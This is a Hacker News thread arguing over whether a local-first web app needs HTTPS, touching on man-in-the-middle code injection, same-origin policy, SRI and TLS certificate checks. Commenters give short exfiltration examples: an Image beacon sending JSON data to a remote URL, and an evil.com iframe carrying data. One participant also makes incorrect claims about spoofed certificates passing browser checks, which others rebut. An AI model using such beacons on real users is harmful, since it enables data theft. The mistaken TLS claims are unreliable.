CORS allows a site to bypass same origin policy according to a whitelist specified in the corresponding HTTP header. The setup on evil.com is irrelevant. CORS must be instantiated from the server sending the page.

https://en.wikipedia.org/wiki/Cross-origin_resource_sharing


No. From your link: "Note that in the CORS architecture, the ACAO header is being set by the external web service (service.example.com), not the original web application server (www.example.com). CORS allows the external web service to authorise the web application to use its services and does not control external services accessed by the web application."


How does same-origin policy (on a MITM'd website) prevents this?

    (new Image()).src = 'https://example.com/data.php?payload=' + JSON.stringify(data);


It doesn't because Same-origin protects data on example.com, not on the embedding page (in your example). It is not a security measure that aims to prevent the issue mentioned by the grand parent post



> The only thing that crosses the wire is a request for the application code and a response with that code.

If someone man-in-the-middled the downloading of the app code (trivial, if not HTTPS), then none of those constraints you later mention would be true and the user’s data is now compromised.


In the case described there is no user data crossing the wire to compromise. Secondly, a man in the middle attack is only valid (in this case) if you want to modify the application code in transit to corrupt the application itself. This is defacement and nontrivial. Finally, you cannot use this form of attack to break privacy. Others on here have attempted examples, but they have all failed.

If you can break same origin policy submit a bug to Google. That would be a significant defect that would warrant their top tier bug bounty.

https://en.wikipedia.org/wiki/Man-in-the-middle_attack


If the app code goes over HTTP, it makes zero difference if you send data or not in your app. Not exactly the same scenario, but very close to my point is a situation a while back where JavaScript was injected into non-SSL web traffic that was used to DDoS Github[0].

Seriously, use HTTPS for everything. Not to be rude at all (seriously!), but it’s pretty obvious by this thread and the other you linked to that you don’t have the knowledge/experience on this topic, so do your users a favor and trust when I say you need to be using HTTPS.

[0] https://www.theregister.co.uk/2015/03/27/github_under_fire_f...


There is no user data crossing the wire. You are instead sending code that the user will execute. An attacker can substitute literally any code they wish. This new code can collect user data and send it over the wire literally anywhere.

SOP offers zero protection against this. Just load evil.com?data=XYZ in an iframe.



> Others on here have attempted examples, but they have all failed.

Where? I’m happy to prove the attack vector if necessary, would be trivial for me to do if the app is designed the way you described it (and no, not eligible for any Google bounty as this has nothing to do with same origin policy).


If you don't use HTTPS you are also forgoing the integrity check and not only the encryption. Any router standing between your users and your servers could inject anything into your code, html, etc.


There's a corner case where, surprisingly, your parent's point kinda works, SRI:

https://developer.mozilla.org/en-US/docs/Web/Security/Subres...

If a site exists just to host resources protected with SRI then you can in principle use HTTP, the resource integrity protection will fire and so long as the main page's origin was genuine (e.g. protected with HTTPS) you come out OK...

But SRI isn't even implemented at all in Safari or IE. So, there's a good chance if you have Mac or Windows users they're screwed.

This really is a corner case, even if some day Safari and IE get SRI, you should always just use HTTPS to actually protect resources in flight. The purpose of SRI is more around not fully trusting a sub-resource you've intentionally linked not to be changed.


Right, but you still need HTTPS for the main domain.


There is the possibility of corrupting the integrity of the application code in this way, but this doesn't void privacy thanks to the same origin policy. https://en.wikipedia.org/wiki/Same-origin_policy

If integrity of the application is violated the application is broken or defective. Fortunately the application is open source and so integrity violations can be easily verified. More fortunately still the application is a diff tool, so it can perform self validation across the wire by comparing the transmitted application code against the stored application code.


> Fortunately the application is open source and so integrity violations can be easily verified. More fortunately still the application is a diff tool, so it can perform self validation across the wire by comparing the transmitted application code against the stored application code.

It could, if you had any guarantee that the application code was not compromised the first time, and if you had a customized browser that responded to a navigation request by checking for and running the stored application code for th URL to decide whether or not to use the downloaded code. But that's not the way browsers normally work.

Furthermore, even if it was, the case of “A web application hooks into the web request lifecycle to guarantee that it's code can never be changed once first loaded and which stores all user data locally” is an unusual-enough case (if even possible to implement) that there is a good reason that the always-HTTPS crowd doesn't address it: it's simply not a case which has any real-world relevance. At that point, sure, you don't need HTTPS after the initial download, because you don't need web requests at all since you are effectively unconditionally throwing away the response in favor of locally stored code.


I may be misunderstanding but I don't believe the Same-origin policy will protect you there. You're browser wouldn't be able to tell whether the JS it's reading is the real one or the modified one. So it would be all "same origin" for it.

It won't stop a modified code from pushing data to anywhere in the web either.

> More fortunately still the application is a diff tool, so it can perform self validation

Yes, if the application has been loaded before but I feel like it would be a half-baked HSTS implementation.

Edit: it was too convoluted


Also if the attack did take place at the router then HTTPS certainly is irrelevant regardless of what the browser is doing. HTTP and HTTPS ride over TCP. If you can modify code at the router then you can change the TCP packets to spoof the page address or HTTP response and sidestep HTTPS or the requested domain entirely.

https://en.wikipedia.org/wiki/Transport_Layer_Security

Simply modify the TCP connection in transit to return other TSL encrypted data than what the user asked for. Really, if you are already at the router you can essentially do anything to the user's traffic and modify it in any way except read encrypted data. Simply redirect the user to a spoofed domain with a spoofed page running malicious code sent as HTTPS. Then you can gather all the privacy data you want through HTTPS.


The guarantee TLS provides is not that content is unable to be modified, but that any modifications are detectable.

The router (or anything else between your computer and the server) can modify the content in transport to its heart's content, but it won't be able to sign it with the domain's private key, and so the browser will always know when such modifications have taken place and flag them as malicious.


That is true after the certificate chain is validated by the browser, but not before. A malicious router attack could just as easily modify the initial http request so that the user is directed to the domain on a spoofed IP before HTTPS trust violation. The malicious http server would also have to spoof the original cert though, but then they get malicious trusted https on the trusted domain that returns similar looking code.


It doesn't matter. The browser can use the SSL certificate and the corresponding public key to verify that the contents of the connection originated from the server at the domain it expects. Unless the server's private key or browser's root certificates are compromised, the connection cannot be spoofed without being detected.


You really didn't read what I wrote. If the malicious site uses the valid domain and a spoofed cert for that domain it cannot tell the difference and will establish the very same trust. The browser has no way of knowing if the requested domain is hosted from the appropriate IP address. This is all handled by the DNS system. DNS lookups and caching are not a function of the browser.

Perhaps you will take it more seriously if it comes from Wikipedia: https://en.wikipedia.org/wiki/Certificate_authority#Validati...


I did read what you wrote, but it's incorrect because you can't create a valid certificate for a domain you don't control.

> If the malicious site uses the valid domain and a spoofed cert for that domain it cannot tell the difference and will establish the very same trust. The browser has no way of knowing if the requested domain is hosted from the appropriate IP address.

In your scenario, the browser receives the spoofed certificate. The domain matches, but when it checks the certificate chain against its root certificates, it can't find a matching signature. Because of this, the browser knows the certificate hasn't been signed by a certificate authority it trusts, and it throws up that warning page about visiting an unsafe site.

Your Wikipedia article (and my earlier caveat about the server's private key being compromised) refers not to spoofing a cert, but to the CA being tricked into signing a certificate for a party who doesn't control the domain:

> In particular, it is always vulnerable to attacks that allow an adversary to observe the domain validation probes that CAs send.

In this case, requests to that specific domain would be vulnerable to man-in-the-middle attacks. However, it's outside the scope of TLS, which only ensures security in transport when neither the client nor the server have been compromised; it has nothing to do with securing private keys or verifying control of a domain in the first place.


Spoofed certs are difficult, especially if you turn off certs like let's encrypt with dns.


> A malicious router attack could just as easily modify the initial http request so that the user is directed to the domain on a spoofed IP before HTTPS trust violation.

If the initial request is HTTPS, everything is validated, and a spoofed redirect is impossible.


At a high level this is true, but in practice it's not what's happening, TLS 1.3 makes this tidier so let's use that example:

1. Alice proposes to send encrypted messages to Bob, she hopes this first, unencrypted, message reaches Bob (but if it doesn't she'll be fine, except that she reveals she wanted to talk to Bob) and it has a Diffie-Hellman Key Share inside it which is just basically a number Alice got by doing some mathematics on a (different) random number that Alice never tells anybody, even Bob.

2. Somebody receives Alice's message, they do the other half of the Diffie-Hellman Key Share, and send that to Alice. Both this somebody and Alice now (thanks to DH) have a set of symmetric encryption keys nobody else knows. So using symmetric encryption they immediately have an encrypted channel between Alice and whoever somebody is.

3. The somebody sends Bob's certificate over the encrypted channel. But Bob's certificate is a public document, it does NOT prove this is Bob.

4. If this is really Bob he wraps up everything they both said so far (message from Alice, reply from Bob, sending back a certificate etcetera) and Signs that with his private key which is paired with the public key inside his certificate. He sends the signature to Alice over the encrypted channel. He _could_ also demand a certificate & signature from Alice at this point but on the web basically nobody does this.

5. Now Alice knows this is really Bob and can safely send messages on the encrypted channel to Bob.

There's no need for any messages to be signed with Bob's key after step 4, all messages are protected with the symmetric encryption keys agreed in steps 1 & 2.

Simply "flagging" things if they're apparently changed isn't good enough, bad guys can use this to create an "Oracle" which destroys security eventually. Instead modern TLS with AEAD will simply abort the entire connection after decrypting a message which has been tampered with, and (correct implementations of) TLS refuse to give you partially decrypted messages, either the whole message arrives and is decrypted successfully, or it hasn't and you can't have the data. Thus an adversary learns nothing from tampering: They know they tampered with the message, and it's not a surprise this blew up the connection - doing it again, and again, and again teaches them nothing further.

If you want to see how it could go wrong otherwise, check out videos of "Lucky Thirteen" which gradually guesses bits of data your browser is wiling to send repeatedly over HTTPS connections while it improves the guess (e.g. cookies). A modern browser mitigates this attack by making the timing involved impractical, but AEAD is better.


It's far more common for this to happen beyond the router. A few years ago there was a spate of ISPs injecting ads onto sites they don't control, because HTTP doesn't prevent them from doing so. HTTPS does.


I remember that and defacement is a valid and important concern. This is probably the most realistic and valid concern raised here.

These attacks would work well for advertising because the ISP would inject an iframe into the page that sources unique content and beacons data back to the source of the iframe. This breaks anonymity, but it doesn't break privacy since the code in the iframe cannot access the surrounding page.


That's not how TLS works, your browser has a list of CA(certificate authority)s it can trust, unless a CA gone rogue(which has happened before), you can't change traffic and make it appear from someone else(read on public-key signing).


Where is the key signed? It is signed at the web server providing the HTTPS response. It isn't signed by the CA. The CA provides a digital signature to the certificate to validate the certificate using cryptography (X.509 standard). Digital signature algorithms are very different from the encryption algorithms used in the PKI model.

Wikipedia also explains this limitation with regard to breaking DNS: https://en.wikipedia.org/wiki/Certificate_authority


What's your point? The CA certificate is used during signing part of the hash calculation.


A malicious router (or any entity between you and the site you're trying to connect to) redirecting your traffic is the exact situation that HTTPS protects against.


It does not. Redirection from the router involves only TCP and DNS actions. HTTPS does not encrypt TCP. HTTPS is an encrypted tunnel that rides over TCP. HTTPS is a layer 7 protocol while TCP is a layer 4 protocol. You can encrypt TCP as well if you are using IPSEC. IPSEC is built into IPv6 by default, but it fails with NAT over IPv4, which is still most of the internet.

None of that is what HTTPS is for though. The primary function of HTTPS is to prevent HTTP traffic from being sent in the clear so that anybody could read it.


If the user is trying to access https://example.com, and an attacker redirects the TCP connection (or fakes a response to the DNS query so the user gets the wrong IP address) to a server that doesn't have the private key for example.com's HTTPS certificate, then the HTTPS connection will fail. The attacker is unable to serve their own content to the user as "https://example.com". HTTPS doesn't just encrypt the connection, but also authenticates the integrity of connections as being from the domain they claim to be from.


https://www.computerworld.com/article/2897815/microsoft-blac...

Spoofing a certificate isn't trivial but fraudulent certificates are a thing. This is why there are revocation lists and OCSP.


Well, the Same origin policy may protect the users a bit if the attack takes place after they've downloaded the app, but if they haven't - the attacker can modify it and they won't even notice.


I'm going to sorta break the prime directive and link the n-gate rebuttal to these articles: http://archive.fo/xcQ5j

Its a bit heavy-handed, but it does bring up a good point: A lot of this argument for HTTPS-by-default is all on top of assumptions about who is responsible for data security. We're doing a lot and things are improving, but the general public still are all yelling at websites for misusing data that we willingly gave over in the first place [0].

[0]:https://xkcd.com/743/


> assumptions about who is responsible for data security.

The chief assumption appears to be "anyone but the browser vendors". Let us consult the article:

  BeEF
  This, to me, was the most impactful demo
Quite the endorsement. So what's BeEF's angle?

"...examines exploitability within the context of the one open door: the web browser."

There could hardly be a clearer expression of contempt for the browser vendors' offerings. But remember, the "open door" is nothing to do with them, it's all your fault for not serving via HTTPS.

Welcome to Clown World.


Eh, there are two execution contexts here.

1. The web browser executing the injected data stream it receives from the remote computer.

2. Your brain interpreting 'non-executable' instructions as received from your browser.

Browser security has nothing to do with me going to 'xyz.com', which is the trusted website for xyz company, and being fed a MiTM telling me to go to a bad phone number for support.


The fact that site gets "erased" partway down, as if attacked by an evil MiTM, proves it's not serious and is, in fact, arguing for HTTPS.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: